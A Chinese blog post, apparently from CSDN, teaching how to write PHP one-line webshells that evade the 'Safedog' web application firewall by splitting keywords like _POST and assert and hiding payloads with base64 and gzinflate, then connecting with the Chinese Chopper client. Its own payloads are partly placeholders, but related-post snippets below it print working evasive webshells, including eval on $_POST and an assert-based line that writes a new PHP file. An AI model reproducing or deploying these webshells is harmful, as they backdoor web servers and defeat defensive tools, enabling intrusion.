斗狗记之PHP一句话bypass

最新推荐文章于 2024-05-28 10:57:22 发布
最新推荐文章于 2024-05-28 10:57:22 发布
阅读量211 收藏
点赞数
文章标签: 字符串 php thinkphp 数学建模 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486411
版权

分享两个过狗的PHP一句话吧,并且讲一讲我的过狗思路

    <?php   #木马免杀:从打狗到被狗咬
    error_reporting(0);  
    echo "404 Not Found.";  
    $building= "ps_ot*^7#[email protected]@666666666666666666666666666666666666666666666666666" ;  
    $build =strtoupper($building[2]. $building[0] .$building[3]. $building[1].$building[4] );  
    if (你想过狗?) {eval ( 参考截图代码咯~ );} ?>

这个bypass的一句话思路就是:拆分敏感关键字“post”,以“strtoupper()” 函数把字符串转换为大写,

以数组形式取关键字字符进行拼接:_POST,将其赋值给变量“$build”,带入下面的if语句执行。

blob.png

完美过狗,下面用菜刀连上试试

blob.png

缺点:仍有敏感字符函数“eval”

下面一个bypass的PHP一句话运用的是拼接关键字+字符编码,此种方法的好处就是没有任何敏感字符函数

<?php   #木马免杀:从打狗到被狗咬
$gg="补丁君66666666666666##abbsbbsbbebbrbbt##building6666666666";
$bb=explode("bb",$gg);
$bing=$bb[0].$bb[1].$bb[2].$bb[3].$bb[4].$bb[5];
$bing(gzinflate(base64_decode('你想过狗吗?')));
?>

讲讲这个bypass的过程:首先,还是从$gg中拼接出字符串“assert”:以“explode()”函数把$gg里的'bb'分割出来,处理成数组,然后就是提取数组元素拼接成函数。里面的加密编码用“Base64+Gzinflate”进行解密

blob.png

顺利的过狗,用菜刀试试连接是否正常:

blob.png
KEY0NE
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Space-Fighters:一款太空斗狗游戏
06-03
《太空战士》是一款基于C语言开发的太空斗狗游戏,其设计灵感可能源自于经典的空间战斗模拟游戏,但采用C语言编程,使游戏在效率和性能上有着良好的表现。C语言是计算机科学的基础,以其高效、简洁和底层控制能力强...
过狗一句话原理与利用
金色%夕阳的博客
05-03 1854
过狗一句话原理与利用 在之前的文件上传漏洞中就有介绍过木马文件,通过上传木马文件实现远程连接从而进行远程控制操作。利用上传文件漏洞上传木马文件过程中,可能会遇到服务端对上传文件后缀、文件名、文件格式以及文件内容等进行检测过滤,从而导致木马文件上传失败。如今存在很多过滤机制与安全产品能够实现网站上传保护,比如安全狗。因此,学习如何绕过这些保护机制成功上传木马文件是至关重要的。在下面的学习中我们称之为过狗一句话,该名称源于绕过安全狗的检测机制成功过上传一句话木马文件。 在学习过狗一句话之前,需要先学习一句话木马
过狗的一句话
qq_41814777的博客
10-20 988
php过狗一句话: waf通常以关键字来判断是否是一句话木马。 <?php $test="e#v#a#l"; $test1=explode("#",$test); $test2=$test1[0].$test1[1].$test1[2].$test1[3]; $test2($_POST['zt']); ?> 这是eval函数的一句话的写法 <?...
利用PHP字符串解析特性Bypass
最新发布
2401_84466359的博客
05-28 1188
上述PHP语句的参数%20news[id%00的值将存储到$_GET["news_id"]中。HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符2.将某些字符转换为下划线(包括空格)parse_str函数通常被自动应用于get、post请求和cookie中。如果你的Web服务器接受带有特殊字符的参数名,那么也会发生类似的情况。如上代码所示,我进行了多次循环,枚举了参数名三个位置的0到255之间的所有字符,看看解析函数到底是如何处理这些特殊字符的。
【免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路
Fly_鹏程万里
03-04 1706
00x1.关键字拆分 比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。 总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。 00x2.可变变量、引用、可变函数。 可变变量:比如$a=$_POST[‘x’];$b=’a’;@eval($$b); 测试结果: 总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!引用:比...
php 过狗一句话木马的编写
热门推荐
大方子
09-02 1万+
  我们都知道 这个是php一句话  &lt;?php assert($_POST['mima']); ?&gt;可是服务器的安全狗会识别到,我们要经过一些处理, 让安全狗不能认出我们的代码是一句话木马。 好多小白只会用一句话,但是不知道原理,我先大概说一下一句话木马的原理 assert是一个php的函数 assert(这里写代码)  这个函数会执行括号里的代码,(eval 的一句话木...
00截断上传绕过_绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)...
weixin_39663970的博客
12-20 245
思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。废话不多说,切入正题。。。。1、实验环境:Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.120482、用于文件上传的PHP源码:...
【日记】关于庙会的日记800字(精选5篇).doc
11-13
3. **历史建筑**:文中提到的隆兴寺是寺庙之一,内有大佛和菩萨像,反映了古代的宗教信仰和建筑艺术。 4. **传统工艺**:千手观音菩萨雕像被描述为纯木质,显示了古代工匠的高超技艺;吹糖人则是传统手工艺的体现,...
Pocket Starfighter:三维第一人称空间死亡竞赛!-开源
04-29
这款游戏的设计理念是提供一种快速、刺激的太空斗狗(dogfighting)体验,完全采用C语言编写,并利用SDL(Simple DirectMedia Layer)库来实现图形渲染和输入处理,这使得游戏在性能和兼容性上具有出色的表现。...
桑迪·麦克特里戈最后的死期.docx
12-21
在一次事件中,迈克救下了原本被桑迪用于斗狗的喀山和戴恩犬,他对这两只狗产生了深厚的兴趣,尤其是喀山的独特行为让他困惑。 迈克教授在北方的史密森工作,他的专业领域涉及狗的智力研究,他曾经撰写的文章引起了...
nations-of-mankind-wfrp4e:基于Boss的WFRP4人类非官方补编的铸造VTT模块
05-16
人类国家FoundryVTT的非正式补充 该模块旨在使Big Boss的非官方人类补充...帝国,不列颠尼亚,基斯列夫和斗狗主题兽 帝国军团和骑士团的定制规则 法律规定 模块开发人员:Seseta,Noober作者:大老板。 规则制定:大老
免杀PHP大马过狗
06-13
免杀PHP大马过狗欢迎大家来测试密码123123本程序不得用于商业用途,仅做学习交流
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
一句话木马过狗 php,PHP一句话木马过安全狗等杀软
weixin_30774813的博客
03-09 316
第一种:1.php=($_=@$_GET[2]).@$_($_GET[1])?>用中国菜刀连接:http://www.cn-caidao.com/1.php?2=assert密码是1第二种:2.php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>=${'_'.$_}['_'](${'_'....
过安全狗/D盾/360的PHP一句话木马与防范方法
主题模板站的博客
01-29 847
D盾,他不认识二维数组,所以就很轻松绕过了。对了 还有360哦~ 测试了下安全狗,也查不出来,,。防御方法:就是网站下载下来这些php文件,然后通过字符串查找,类似上面的字符。本文阐述了过安全狗/D盾/360的PHP一句话木马,欢迎大家多多指点。过D盾很容易,当然下面还提供一个0等级就的。这样改,立马就变成1个等级的了。过D盾PHP一句话木马。
一句话木马过狗 php,php过狗一句话
weixin_34812649的博客
03-09 524
1、原一句话:简单利用方法:?a=assert&b=${fputs(fopen('d.php','w'),'')};复杂利用方法:?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};URL解码...
一句话木马:PHP
09-20 145
珍藏版: 一个简单的过D盾的免杀php <?php $ab = $_REQUEST['d']; $a['t'] = "";//主要带对象 D盾就不管后面的了。。。 eval($a['t'].$ab); 过狗过D盾 <?php $a = $_REQUEST['d'];//参数 $a = "$a";//狗不会二次检测 $b['test...
php bypass shell,PHP-WebShell-Bypass-WAF
weixin_29531989的博客
04-10 188
PHP-WebShell-Bypass-WAFPHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码:WebShell 的输入点在$_GET和$_POST,执行点在eval(),经典的一句话WAF 都会拦截测试:测试:测试:综合上面三点,可以发现WAF 是通过关键字来拦截的,把这三个测试用例放到安全狗下测试可以发现,安全狗是通过综合判断来识别WebShell 的,...
ATT&CT实战系列-红队实战(三)
luson2014的博客
12-03 1655
一、环境搭建 靶机下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 本次环境为黑盒测试,不提供虚拟机账号密码, 本次模拟实战攻击目标是域控的一份重要的文件 centos 出网机,有两张网卡,一张为桥接模式网卡 ip 为 22.117.22.60,另外一张是内部网卡仅主机模式IP地址为192.168.93.100。 Ubuntu为nginx代理服务器(需要启动,centos的web服务才可以正常提供服务,否则会报502错误) win2.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值